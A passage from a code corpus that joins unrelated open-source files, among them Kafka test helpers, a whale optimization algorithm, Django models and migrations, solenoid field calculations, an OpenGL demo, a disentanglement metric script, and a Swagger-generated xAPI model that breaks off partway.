with capture_new_messages(topic) as get_kafka_messages:
def get_data_pipeline_messages(count=100):
kafka_messages = get_kafka_messages(count)
return [
create_from_offset_and_message(kafka_message)
for kafka_message in kafka_messages
]
yield get_data_pipeline_messages
@contextmanager
def capture_new_messages(topic):
"""Seeks to the tail of the topic then returns a function that can
consume messages from that point.
"""
with setup_capture_new_messages_consumer(topic) as consumer:
def get_messages(count=100):
return consumer.get_messages(count=count)
yield get_messages
@contextmanager
def setup_capture_new_messages_consumer(topic):
"""Seeks to the tail of the topic then returns a function that can
consume messages from that point.
"""
kafka = KafkaClient(get_config().cluster_config.broker_list)
group = str('data_pipeline_clientlib_test')
consumer = SimpleConsumer(kafka, group, topic, max_buffer_size=_ONE_MEGABYTE)
consumer.seek(0, 2) # seek to tail, 0 is the offset, and 2 is the tail
yield consumer
kafka.close()
| 2.25 | 2 |
src/neqsim/neqsimpython.py | equinor/neqsimpython | 20 | 12772866 | import jpype
jpype.addClassPath('./lib/NeqSim.jar')
if not(jpype.isJVMStarted()):
jpype.startJVM(convertStrings =True)
neqsim = jpype.JPackage('neqsim') | 1.796875 | 2 |
LWOA.py | ZongSingHuang/L-vy-Whale-Optimization-Algorithm | 4 | 12772867 | <reponame>ZongSingHuang/L-vy-Whale-Optimization-Algorithm
# -*- coding: utf-8 -*-
"""
Created on Thu Jul 16 21:59:58 2020
@author: ZongSing_NB
https://doi.org/10.1109/ACCESS.2017.2695498
"""
import math
import numpy as np
import matplotlib.pyplot as plt
class LWOA():
def __init__(self, fitness, D=30, P=20, G=500, ub=1, lb=0,
b=1, a_max=2, a_min=0, a2_max=-1, a2_min=-2, l_max=1, l_min=-1):
self.fitness = fitness
self.D = D
self.P = P
self.G = G
self.ub = ub*np.ones([self.P, self.D])
self.lb = lb*np.ones([self.P, self.D])
self.a_max = a_max
self.a_min = a_min
self.a2_max = a2_max
self.a2_min = a2_min
self.l_max = l_max
self.l_min = l_min
self.b = b
self.gbest_X = np.zeros([self.D])
self.gbest_F = np.inf
self.loss_curve = np.zeros(self.G)
def opt(self):
# 初始化
self.X = np.random.uniform(low=self.lb, high=self.ub, size=[self.P, self.D])
# 迭代
for g in range(self.G):
# 適應值計算
F = self.fitness(self.X)
# 更新最佳解
if np.min(F) < self.gbest_F:
idx = F.argmin()
self.gbest_X = self.X[idx].copy()
self.gbest_F = F.min()
# 收斂曲線
self.loss_curve[g] = self.gbest_F
# 更新
a = self.a_max - (self.a_max-self.a_min)*(g/self.G)
a2 = self.a2_max - (self.a2_max-self.a2_min)*(g/self.G)
for i in range(self.P):
p = np.random.uniform()
r1 = np.random.uniform()
r2 = np.random.uniform()
r3 = np.random.uniform()
A = 2*a*r1 - a #(2.3)
C = 2*r2 # (2.4)
l = (a2-1)*r3 + 1 # (???)
if p>0.5:
D = np.abs(self.gbest_X - self.X[i, :])
self.X[i, :] = D*np.exp(self.b*l)*np.cos(2*np.pi*l)+self.gbest_X # (6)
else:
if np.abs(A)<1:
D = np.abs(C*self.gbest_X - self.X[i, :])
self.X[i, :] = self.gbest_X - A*D # (2)
else:
X_rand = self.X[np.random.randint(low=0, high=self.P, size=self.D), :]
X_rand = np.diag(X_rand).copy()
D = np.abs(C*X_rand - self.X[i, :])
self.X[i, :] = X_rand - A*D # (9)
for i in range(self.P):
u = np.random.uniform()
r4 = np.random.uniform()
self.X[i, :] = self.X[i, :] +u*np.sign(r4-0.5)*self.Levyflight()
# 邊界處理
self.X = np.clip(self.X, self.lb, self.ub)
def plot_curve(self):
plt.figure()
plt.title('loss curve ['+str(round(self.gBest_curve[-1], 3))+']')
plt.plot(self.gBest_curve, label='loss')
plt.grid()
plt.legend()
plt.show()
def Levyflight(self):
beta = 1.5
f1 = math.gamma(1+beta)
f2 = beta * math.gamma(1+beta) / 2
f3 = np.sin(np.pi*beta/2)
f4 = 2**( (beta-1)/2 )
sigma_u = ( f1/f2 * f3/f4 ) ** (2/beta)
sigma_v = 1.0 # (12)
u = np.random.normal(0, sigma_u)
v = np.random.normal(0, sigma_v)
s = u / ( np.abs(v)**(1/beta) )
return s
| 2.328125 | 2 |
sales/migrations/0001_initial.py | GeekGuste/ecommerce-nuxtjs-djoser | 0 | 12772868 | # Generated by Django 4.0.1 on 2022-05-09 17:09
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Category',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('label', models.CharField(max_length=200)),
('is_active', models.BooleanField()),
('parent', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='enfants', to='sales.category')),
],
),
migrations.CreateModel(
name='DeliveryZoneInfo',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('zone', models.CharField(max_length=100)),
('delivery_charges', models.DecimalField(decimal_places=2, max_digits=15)),
],
),
migrations.CreateModel(
name='Product',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('label', models.CharField(max_length=200)),
('description', models.TextField()),
('qte_stock', models.IntegerField(default=100)),
('principal_image', models.ImageField(null=True, upload_to='products')),
('is_variant', models.BooleanField(default=False)),
('variant_value', models.CharField(blank=True, max_length=200, null=True)),
('price', models.CharField(max_length=50)),
('promo_price', models.CharField(blank=True, max_length=50)),
('is_active', models.BooleanField(default=True)),
('pub_date', models.DateTimeField(auto_now=True)),
('category', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='sales.category')),
('parent', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='variants', to='sales.product')),
],
),
migrations.CreateModel(
name='Tags',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('label', models.CharField(max_length=100)),
],
),
migrations.CreateModel(
name='VariantType',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('label', models.CharField(max_length=100)),
],
),
migrations.CreateModel(
name='Video',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('file', models.FileField(upload_to='products_video')),
('product', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='videos', to='sales.product')),
],
),
migrations.AddField(
model_name='product',
name='variant_type',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='sales.varianttype'),
),
migrations.CreateModel(
name='Order',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('order_date', models.DateTimeField(auto_now=True)),
('total', models.DecimalField(decimal_places=2, max_digits=15)),
('country', models.CharField(max_length=100)),
('last_name', models.CharField(max_length=100)),
('first_name', models.CharField(max_length=100)),
('address', models.CharField(max_length=255)),
('phone_number', models.CharField(max_length=100)),
('town', models.CharField(max_length=100)),
('delivery_charges', models.DecimalField(decimal_places=2, max_digits=15)),
('postal_code', models.CharField(max_length=20, null=True)),
('creation_date', models.DateTimeField(auto_now_add=True)),
('payment_date', models.DateTimeField(null=True)),
('is_paid', models.BooleanField(default=False)),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Image',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('photo', models.ImageField(upload_to='products')),
('product', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='images', to='sales.product')),
],
),
migrations.CreateModel(
name='DeliveryAddress',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('country', models.CharField(max_length=100)),
('address', models.CharField(max_length=255)),
('phone_number', models.CharField(max_length=100)),
('town', models.CharField(max_length=100)),
('postal_code', models.CharField(max_length=20)),
('additional_informations', models.TextField()),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
| 1.679688 | 2 |
tests/test_hello.py | smheidrich/lovely-pytest-docker | 1 | 12772869 | <reponame>smheidrich/lovely-pytest-docker
from urllib.request import urlopen
def test_hello_world(docker_hello_world):
"""Test if the container is reachable.
The docker_hello_world fixture is used, so the container will start on test
startup. Do a request to the docker service and read the body.
"""
res = urlopen(docker_hello_world).read()
assert b'<title>HTTP Hello World</title>' in res
def test_single_container(docker_hello_world, docker_services):
"""Test if only the requested containers are started.
The container for hello2 is never started as the fixture is not used.s
"""
res = docker_services._docker_compose.execute("ps")
assert 'hello' in res
assert 'hello2' not in res
def test_exec(docker_services):
"""Test the exec method.
The exec method executes a command inside a docker command.
"""
res = docker_services.exec('hello', 'ls', '-a')
assert res == '.\n..\nindex.html\n'
# counter
custom_checker_called = 0
def custom_checker(ip_address, port):
global custom_checker_called
if custom_checker_called > 1:
return True
custom_checker_called += 1
return False
def test_custom_checker(docker_services):
"""Test a custom checker in the wait_for_service method."""
docker_services.wait_for_service("hello", 80, check_server=custom_checker)
assert custom_checker_called > 1
| 2.703125 | 3 |
portfolio/models.py | macmohan26/EagleFinancialServices | 0 | 12772870 | from django.db import models
from django.utils import timezone
from django.contrib.auth.models import User
from yahoo_finance import Share
class Customer(models.Model):
name = models.CharField(max_length=50)
address = models.CharField(max_length=200)
cust_number = models.IntegerField(blank=False, null=False)
city = models.CharField(max_length=50)
state = models.CharField(max_length=50)
zipcode = models.CharField(max_length=10)
email = models.EmailField(max_length=200)
cell_phone = models.CharField(max_length=50)
created_date = models.DateTimeField(
default=timezone.now)
updated_date = models.DateTimeField(auto_now_add=True)
def created(self):
self.created_date = timezone.now()
self.save()
def updated(self):
self.updated_date = timezone.now()
self.save()
def __str__(self):
return str(self.cust_number)
class Investment(models.Model):
customer = models.ForeignKey(Customer, related_name='investments')
category = models.CharField(max_length=50)
description = models.CharField(max_length=200)
acquired_value = models.DecimalField(max_digits=10, decimal_places=2)
acquired_date = models.DateField(default=timezone.now)
recent_value = models.DecimalField(max_digits=10, decimal_places=2)
recent_date = models.DateField(default=timezone.now, blank=True, null=True)
def created(self):
self.acquired_date = timezone.now()
self.save()
def updated(self):
self.recent_date = timezone.now()
self.save()
def __str__(self):
return str(self.customer)
def results_by_investment(self):
return self.recent_value - self.acquired_value
class Stock(models.Model):
customer = models.ForeignKey(Customer, related_name='stocks')
symbol = models.CharField(max_length=10)
name = models.CharField(max_length=50)
shares = models.DecimalField(max_digits=10, decimal_places=2)
share_value = models.DecimalField (max_digits=10, decimal_places=2)
purchase_price = models.DecimalField(max_digits=10, decimal_places=2)
purchase_date = models.DateField(default=timezone.now)
def created(self):
self.recent_date = timezone.now()
self.save()
def __str__(self):
return str(self.customer)
def initial_stock_value(self):
return self.shares * self.purchase_price
def current_stock_price(self):
symbol_f = self.symbol
data = Share(symbol_f)
share_value = (data.get_open())
return share_value
def current_stock_value(self):
symbol_f = self.symbol
data = Share(symbol_f)
share_value = (data.get_open())
if share_value is None:
return float(self.shares)
else:
return '{0:.2f}'.format(float(share_value) * float(self.shares))
| 2.4375 | 2 |
scrapy_do/client/webclient.py | umairwaheed/scrapy-do | 64 | 12772871 | #-------------------------------------------------------------------------------
# Author: <NAME> <<EMAIL>>
# Date: 22.01.2018
#
# Licensed under the 3-Clause BSD License, see the LICENSE file for details.
#-------------------------------------------------------------------------------
import requests
import urllib3
from scrapy_do.client import ClientException
from requests.auth import HTTPDigestAuth
#-------------------------------------------------------------------------------
def request(method, url, payload={}, auth=None, ssl_verify=True):
"""
Send a request to the server and retrieva the response.
:param method: request method ('POST' or 'GET')
:param url: url to be queried
:param payload: parameters of the request
:param auth: tuple containing the authorization
information
:param ssl_verify: SSL verification flag
:raises scrapy_do.client.ClientException: an error
:return: parsed JSON response of the server
or raw data
"""
assert method == 'POST' or method == 'GET'
if not ssl_verify:
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
if auth is not None:
auth = HTTPDigestAuth(*auth)
try:
if method == 'POST':
r = requests.post(url, data=payload, auth=auth, verify=ssl_verify)
else:
r = requests.get(url, params=payload, auth=auth, verify=ssl_verify)
except Exception as e:
raise ClientException(str(e))
if r.headers['Content-Type'] == 'application/json':
data = r.json()
else:
data = r.text
if r.status_code != 200:
if r.headers['Content-Type'] == 'application/json':
raise ClientException(data['msg'])
else:
raise ClientException(data)
return data
| 2.609375 | 3 |
scripts/SolCalc/calculate_PS_rot_single_region.py | FMS-Mu2e/helicalc | 0 | 12772872 | <reponame>FMS-Mu2e/helicalc<gh_stars>0
import sys
from time import time
from datetime import datetime
import argparse
import numpy as np
from helicalc import helicalc_dir, helicalc_data
from helicalc.solcalc import *
from helicalc.geometry import read_solenoid_geom_combined
from helicalc.tools import generate_cartesian_grid_df
from helicalc.constants import (
PS_grid,
TSu_grid,
TSd_grid,
DS_grid,
PStoDumpArea_grid,
ProtonDumpArea_grid
)
# paramdir = '/home/ckampa/coding/helicalc/dev/params/'
paramdir = helicalc_dir + 'dev/params/'
# old version
#paramname = 'Mu2e_PS3_rot_16mrad'
#paramname = 'Mu2e_PS23_rot_16mrad'
# all 3
# individual rotations
# paramname = 'Mu2e_PS123_rot_16mrad'
# datadir = helicalc_data+'Bmaps/SolCalc_partial/PS3_rot_16mrad/'
# base_coils = 'PS3_16mrad'
# rotate coldmass
# 16mrad
# paramname = 'Mu2e_PS_coldmass_rot_16mrad'
# datadir = helicalc_data+'Bmaps/SolCalc_partial/PS_coldmass_rot_16mrad/'
# base_coils = 'PS_coldmass_16mrad'
# 23mrad
# paramname = 'Mu2e_PS_coldmass_rot_23mrad'
# datadir = helicalc_data+'Bmaps/SolCalc_partial/PS_coldmass_rot_23mrad/'
# base_coils = 'PS_coldmass_23mrad'
# 7mrad
paramname = 'Mu2e_PS_coldmass_rot_7mrad'
datadir = helicalc_data+'Bmaps/SolCalc_partial/PS_coldmass_rot_7mrad/'
base_coils = 'PS_coldmass_7mrad'
regions = {'PS': PS_grid, 'TSu': TSu_grid, 'TSd': TSd_grid, 'DS': DS_grid,
'PStoDumpArea': PStoDumpArea_grid,
'ProtonDumpArea': ProtonDumpArea_grid}
if __name__=='__main__':
# parse command line arguments
parser = argparse.ArgumentParser()
parser.add_argument('-r', '--Region',
help='Which region of Mu2e to calculate? '+
'["PS"(default), "TSu", "TSd", "DS", "PStoDumpArea"'+
', "ProtonDumpArea"]')
parser.add_argument('-c', '--Coils',
help='Which coils to calculate? '+
'["1,2,3" (default), "1,2", "1,3", "2,3", 1", "2", "3"]')
# parser.add_argument('-t', '--Testing',
# help='Calculate using small subset of coils?'+
# '"y"(default)/"n"')
args = parser.parse_args()
# fill defaults where needed
if args.Region is None:
args.Region = 'PS'
else:
args.Region = args.Region.strip()
if args.Coils is None:
args.Coils = '1,2,3'
else:
args.Coils = args.Coils.strip()
# if args.Testing is None:
# args.Testing = 'n'
# else:
# args.Testing = args.Testing.strip()
reg = args.Region
coils = [int(i) for i in args.Coils.split(',')]
# print configs
print(f'Region: {reg}')
# print(f'Testing on subset of coils? {args.Testing}\n')
# redirect stdout to log file
dt = datetime.strftime(datetime.now(), '%Y-%m-%d_%H%M%S')
log_file = open(datadir+f"logs/{dt}_calculate_{reg}_region.log", "w")
old_stdout = sys.stdout
sys.stdout = log_file
# print configs in file
# print(f'Region: {reg}')
# print(f'Testing on subset of coils? {args.Testing}\n')
# step size for integrator
drz = np.array([5e-3, 1e-2])
# create grid
df = generate_cartesian_grid_df(regions[reg])
# define base save name
base_name = f'Mau13.SolCalc.{reg}_region.{base_coils}'
# load geometry
geom_df_mu2e = read_solenoid_geom_combined(paramdir,paramname)
# which coils
#if args.Coils != '2-3':
# geom_df_mu2e = geom_df_mu2e.query(f'Coil_Num == {args.Coils}')
geom_df_mu2e = geom_df_mu2e[np.isin(geom_df_mu2e.Coil_Num, coils)]
print(f'{len(geom_df_mu2e)} Coils to Calculate', file=old_stdout)
# TESTING (only a few coils)
# if args.Testing == 'y':
# geom_df_mu2e = geom_df_mu2e.iloc[5:8]
# loop through all coils
N_coils = len(geom_df_mu2e)
for i in range(N_coils):
# for geom in geom_df_mu2e.itertuples():
j = int(round(geom_df_mu2e.iloc[i].Coil_Num))
# print coil number to screen for reference
print(f'Calculating coil {i+1}/'+f'{N_coils}', file=old_stdout)
# instantiate integrator
mySolCalc = SolCalcIntegrator(geom_df_mu2e.iloc[i], drz=drz)
# integrate on grid (and update the grid df)
df = mySolCalc.integrate_grid(df)
# save single coil results
mySolCalc.save_grid_calc(savetype='pkl',
savename=datadir+base_name+f'.coil_{j}',
all_solcalc_cols=False)
# save df with all coils
# i0 = int(round(geom_df_mu2e.iloc[0].Coil_Num))
# i1 = int(round(geom_df_mu2e.iloc[-1].Coil_Num))
# mySolCalc.save_grid_calc(savetype='pkl',
# savename=datadir+base_name+f'.coils_{i0}-{i1}',
# all_solcalc_cols=True)
# close log file
log_file.close()
| 1.804688 | 2 |
ref/v1.1/opengl_test.py | vt-rocksat-2017/dashboard | 1 | 12772873 | #!/usr/bin/env python
from OpenGL.GLUT import *
from OpenGL.GLU import *
from OpenGL.GL import *
import sys
name = 'ball_glut'
def main():
glutInit(sys.argv)
glutInitDisplayMode(GLUT_DOUBLE | GLUT_RGB | GLUT_DEPTH)
glutInitWindowSize(400,400)
glutCreateWindow(name)
glClearColor(0.,0.,0.,1.)
glShadeModel(GL_SMOOTH)
glEnable(GL_CULL_FACE)
glEnable(GL_DEPTH_TEST)
glEnable(GL_LIGHTING)
lightZeroPosition = [10.,4.,10.,1.]
lightZeroColor = [0.8,1.0,0.8,1.0] #green tinged
glLightfv(GL_LIGHT0, GL_POSITION, lightZeroPosition)
glLightfv(GL_LIGHT0, GL_DIFFUSE, lightZeroColor)
glLightf(GL_LIGHT0, GL_CONSTANT_ATTENUATION, 0.1)
glLightf(GL_LIGHT0, GL_LINEAR_ATTENUATION, 0.05)
glEnable(GL_LIGHT0)
glutDisplayFunc(display)
glMatrixMode(GL_PROJECTION)
gluPerspective(40.,1.,1.,40.)
glMatrixMode(GL_MODELVIEW)
gluLookAt(0,0,10,
0,0,0,
0,1,0)
glPushMatrix()
glRotated(90, -1, -1, 0)
glutMainLoop()
return
def display():
glClear(GL_COLOR_BUFFER_BIT|GL_DEPTH_BUFFER_BIT)
glPushMatrix()
color = [1.0,0.,0.,1.]
glMaterialfv(GL_FRONT,GL_DIFFUSE,color)
#glutSolidSphere(2,20,20)
#glutSolidCylinder(10,20,20,20)
glutSolidCone(1.0,4.0,200,100)
#quadratic = gluNewQuadric()
#BASE = 10
#TOP = 10
#HEIGHT = 20
#SLICES = 20
#STACKS = 20
#INNER_RADIUS = 0
#gluCylinder(quadratic, BASE, TOP, HEIGHT, SLICES, STACKS) # to draw the lateral parts of the cylinder;
#gluDisk(quadratic, INNER_RADIUS, OUTER_RADIUS, SLICES, LOOPS) # call this two times in the appropriate environment to draw the top and bottom part of the cylinder with INNER_RADIUS=0.
glPopMatrix()
glutSwapBuffers()
return
if __name__ == '__main__': main()
| 2.703125 | 3 |
eval_dci.py | ratschlab/dgp-vae | 5 | 12772874 | """
Script to compute dci score of learned representation.
"""
import warnings
warnings.simplefilter(action='ignore', category=FutureWarning)
import numpy as np
from absl import flags, app
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
from disentanglement_lib.evaluation.metrics import dci
from disentanglement_lib.visualize import visualize_scores
import os
FLAGS = flags.FLAGS
flags.DEFINE_string('c_path', '', 'File path for underlying factors c')
flags.DEFINE_string('assign_mat_path', 'data/hirid/assign_mats/hirid_assign_mat.npy', 'Path for assignment matrix')
flags.DEFINE_string('model_name', '', 'Name of model directory to get learned latent code')
flags.DEFINE_enum('data_type_dci', 'dsprites', ['hmnist', 'physionet', 'hirid', 'sprites', 'dsprites', 'smallnorb', 'cars3d', 'shapes3d'], 'Type of data and how to evaluate')
flags.DEFINE_list('score_factors', [], 'Underlying factors to consider in DCI score calculation')
flags.DEFINE_enum('rescaling', 'linear', ['linear', 'standard'], 'Rescaling of ground truth factors')
flags.DEFINE_bool('shuffle', False, 'Whether or not to shuffle evaluation data.')
flags.DEFINE_integer('dci_seed', 42, 'Random seed.')
flags.DEFINE_bool('visualize_score', False, 'Whether or not to visualize score')
flags.DEFINE_bool('save_score', False, 'Whether or not to save calculated score')
def load_z_c(c_path, z_path):
try:
c_full = np.load(c_path)['factors_test']
except IndexError:
c_full = np.load(c_path)
z = np.load(z_path)
c = c_full
return c, z
def main(argv, model_dir=None):
del argv # Unused
if model_dir is None:
out_dir = FLAGS.model_name
else:
out_dir = model_dir
z_path = '{}/z_mean.npy'.format(out_dir)
if FLAGS.c_path == '':
if FLAGS.data_type_dci != 'hirid':
c_path = os.path.join(F'/data/{FLAGS.data_type_dci}', F'factors_{FLAGS.data_type_dci}.npz')
else:
c_path = os.path.join(F'/data/{FLAGS.data_type_dci}', F'{FLAGS.data_type_dci}.npz')
else:
c_path = FLAGS.c_path
if FLAGS.data_type_dci == "physionet":
# Use imputed values as ground truth for physionet data
c, z = load_z_c('{}/imputed.npy'.format(out_dir), z_path)
c = np.transpose(c, (0,2,1))
elif FLAGS.data_type_dci == "hirid":
c = np.load(c_path)['x_test_miss']
c = np.transpose(c, (0, 2, 1))
c = c.astype(int)
z = np.load(z_path)
else:
c, z = load_z_c(c_path, z_path)
z_shape = z.shape
c_shape = c.shape
z_reshape = np.reshape(np.transpose(z, (0,2,1)),(z_shape[0]*z_shape[2],z_shape[1]))
c_reshape = np.reshape(np.transpose(c, (0,2,1)),(c_shape[0]*c_shape[2],c_shape[1]))
c_reshape = c_reshape[:z_reshape.shape[0], ...]
# Experimental physionet rescaling
if FLAGS.data_type_dci == 'physionet':
if FLAGS.rescaling == 'linear':
# linear rescaling
c_rescale = 10 * c_reshape
c_reshape = c_rescale.astype(int)
elif FLAGS.rescaling == 'standard':
# standardizing
scaler = StandardScaler()
c_rescale = scaler.fit_transform(c_reshape)
c_reshape = (10*c_rescale).astype(int)
else:
raise ValueError("Rescaling must be 'linear' or 'standard'")
# Include all factors in score calculation, if not specified otherwise
if not FLAGS.score_factors:
FLAGS.score_factors = np.arange(c_shape[1]).astype(str)
# Check if ground truth factor doesn't change and remove if is the case
mask = np.ones(c_reshape.shape[1], dtype=bool)
for i in range(c_reshape.shape[1]):
c_change = np.sum(abs(np.diff(c_reshape[:8000,i])))
if (not c_change) or (F"{i}" not in FLAGS.score_factors):
mask[i] = False
c_reshape = c_reshape[:,mask]
print(F'C shape: {c_reshape.shape}')
print(F'Z shape: {z_reshape.shape}')
print(F'Shuffle: {FLAGS.shuffle}')
c_train, c_test, z_train, z_test = train_test_split(c_reshape, z_reshape, test_size=0.2, shuffle=FLAGS.shuffle, random_state=FLAGS.dci_seed)
if FLAGS.data_type_dci == "hirid":
n_train = 20000
n_test = 5000
else:
n_train = 8000
n_test = 2000
importance_matrix, i_train, i_test = dci.compute_importance_gbt(
z_train[:n_train, :].transpose(),
c_train[:n_train, :].transpose().astype(int),
z_test[:n_test, :].transpose(), c_test[:n_test, :].transpose().astype(int))
# Calculate scores
d = dci.disentanglement(importance_matrix)
c = dci.completeness(importance_matrix)
print(F'D: {d}')
print(F'C: {c}')
print(F'I: {i_test}')
if FLAGS.data_type_dci in ['hirid', 'physionet']:
miss_idxs = np.nonzero(np.invert(mask))[0]
for idx in miss_idxs:
importance_matrix = np.insert(importance_matrix,
idx,
0, axis=1)
assign_mat = np.load(FLAGS.assign_mat_path)
impt_mat_assign = np.matmul(importance_matrix, assign_mat)
impt_mat_assign_norm = np.nan_to_num(
impt_mat_assign / np.sum(impt_mat_assign, axis=0))
d_assign = dci.disentanglement(impt_mat_assign_norm)
c_assign = dci.completeness(impt_mat_assign_norm)
print(F'D assign: {d_assign}')
print(F'C assign: {c_assign}')
if FLAGS.save_score:
if FLAGS.data_type_dci in ['hirid', 'physionet']:
np.savez(F'{out_dir}/dci_assign_2_{FLAGS.dci_seed}', informativeness_train=i_train, informativeness_test=i_test,
disentanglement=d, completeness=c,
disentanglement_assign=d_assign, completeness_assign=c_assign)
else:
np.savez(F'{out_dir}/dci_{FLAGS.dci_seed}', informativeness_train=i_train, informativeness_test=i_test,
disentanglement=d, completeness=c)
# Visualization
if FLAGS.visualize_score:
if FLAGS.data_type_dci == 'hirid':
# Visualize
visualize_scores.heat_square(np.transpose(importance_matrix), out_dir,
F"dci_matrix_{FLAGS.dci_seed}",
"feature", "latent dim")
visualize_scores.heat_square(np.transpose(impt_mat_assign_norm), out_dir,
F"dci_matrix_assign_{FLAGS.dci_seed}",
"feature", "latent_dim")
# Save importance matrices
if FLAGS.save_score:
np.save(F"{out_dir}/impt_matrix_{FLAGS.dci_seed}", importance_matrix)
np.save(F"{out_dir}/impt_matrix_assign_{FLAGS.dci_seed}", impt_mat_assign_norm)
else:
# Visualize
visualize_scores.heat_square(importance_matrix, out_dir,
F"dci_matrix_{FLAGS.dci_seed}",
"x_axis", "y_axis")
# Save importance matrices
np.save(F"{out_dir}/impt_matrix_{FLAGS.dci_seed}", importance_matrix)
print("Evaluation finished")
if __name__ == '__main__':
app.run(main)
| 2.234375 | 2 |
jupyterlab_templates/tests/test_git_repos.py | AndersonReyes/jupyterlab_templates | 0 | 12772875 | import json
import os
import requests
def test_server_loaded_notebooks(notebook_server):
name = "/example-jupyter-notebooks.git/01-MPI-monte-carlo-pi.ipynb"
resp = requests.get(
"{}/templates/names".format(notebook_server),
)
assert resp.status_code == 200, resp.content
assert resp.json() == {"example-jupyter-notebooks.git": [{"name": name}]}
resp2 = requests.get(
"{}/templates/get".format(notebook_server), params={"template": name}
)
assert resp2.status_code == 200, resp.content
data = resp2.json()
assert data["name"] == name
assert data["dirname"] == "/example-jupyter-notebooks.git"
assert json.loads(data["content"]) != {}
dir = os.path.abspath(
os.path.join(os.path.dirname(__file__), "..", "git-templates", name[1:])
)
assert data["path"] == dir
| 2.515625 | 3 |
rustici_software_cloud_v2/models/xapi_activity_definition.py | ryanhope2/scormcloud-api-v2-client-python | 0 | 12772876 | # coding: utf-8
"""
SCORM Cloud Rest API
REST API used for SCORM Cloud integrations.
OpenAPI spec version: 2.0
Contact: <EMAIL>
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class XapiActivityDefinition(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self, name=None, description=None, type=None, more_info=None, interaction_type=None, correct_responses_pattern=None, choices=None, scale=None, source=None, target=None, steps=None, extensions=None):
"""
XapiActivityDefinition - a model defined in Swagger
:param dict swaggerTypes: The key is attribute name
and the value is attribute type.
:param dict attributeMap: The key is attribute name
and the value is json key in definition.
"""
self.swagger_types = {
'name': 'dict(str, str)',
'description': 'dict(str, str)',
'type': 'str',
'more_info': 'str',
'interaction_type': 'str',
'correct_responses_pattern': 'list[str]',
'choices': 'list[XapiInteractionComponent]',
'scale': 'list[XapiInteractionComponent]',
'source': 'list[XapiInteractionComponent]',
'target': 'list[XapiInteractionComponent]',
'steps': 'list[XapiInteractionComponent]',
'extensions': 'dict(str, object)'
}
self.attribute_map = {
'name': 'name',
'description': 'description',
'type': 'type',
'more_info': 'moreInfo',
'interaction_type': 'interactionType',
'correct_responses_pattern': 'correctResponsesPattern',
'choices': 'choices',
'scale': 'scale',
'source': 'source',
'target': 'target',
'steps': 'steps',
'extensions': 'extensions'
}
self._name = name
self._description = description
self._type = type
self._more_info = more_info
self._interaction_type = interaction_type
self._correct_responses_pattern = correct_responses_pattern
self._choices = choices
self._scale = scale
self._source = source
self._target = target
self._steps = steps
self._extensions = extensions
@property
def name(self):
"""
Gets the name of this XapiActivityDefinition.
:return: The name of this XapiActivityDefinition.
:rtype: dict(str, str)
"""
return self._name
@name.setter
def name(self, name):
"""
Sets the name of this XapiActivityDefinition.
:param name: The name of this XapiActivityDefinition.
:type: dict(str, str)
"""
self._name = name
@property
def description(self):
"""
Gets the description of this XapiActivityDefinition.
:return: The description of this XapiActivityDefinition.
:rtype: dict(str, str)
"""
return self._description
@description.setter
def description(self, description):
"""
Sets the description of this XapiActivityDefinition.
:param description: The description of this XapiActivityDefinition.
:type: dict(str, str)
"""
self._description = description
@property
def type(self):
"""
Gets the type of this XapiActivityDefinition.
:return: The type of this XapiActivityDefinition.
:rtype: str
"""
return self._type
@type.setter
def type(self, type):
"""
Sets the type of this XapiActivityDefinition.
:param type: The type of this XapiActivityDefinition.
:type: str
"""
self._type = type
@property
def more_info(self):
"""
Gets the more_info of this XapiActivityDefinition.
:return: The more_info of this XapiActivityDefinition.
:rtype: str
"""
return self._more_info
@more_info.setter
def more_info(self, more_info):
"""
Sets the more_info of this XapiActivityDefinition.
:param more_info: The more_info of this XapiActivityDefinition.
:type: str
"""
self._more_info = more_info
@property
def interaction_type(self):
"""
Gets the interaction_type of this XapiActivityDefinition.
:return: The interaction_type of this XapiActivityDefinition.
:rtype: str
"""
return self._interaction_type
@interaction_type.setter
def interaction_type(self, interaction_type):
"""
Sets the interaction_type of this XapiActivityDefinition.
:param interaction_type: The interaction_type of this XapiActivityDefinition.
:type: str
"""
self._interaction_type = interaction_type
@property
def correct_responses_pattern(self):
"""
Gets the correct_responses_pattern of this XapiActivityDefinition.
:return: The correct_responses_pattern of this XapiActivityDefinition.
:rtype: list[str]
"""
return self._correct_responses_pattern
@correct_responses_pattern.setter
def correct_responses_pattern(self, correct_responses_pattern):
"""
Sets the correct_responses_pattern of this XapiActivityDefinition.
:param correct_responses_pattern: The correct_responses_pattern of this XapiActivityDefinition.
:type: list[str]
"""
self._correct_responses_pattern = correct_responses_pattern
@property
def choices(self):
"""
Gets the choices of this XapiActivityDefinition.
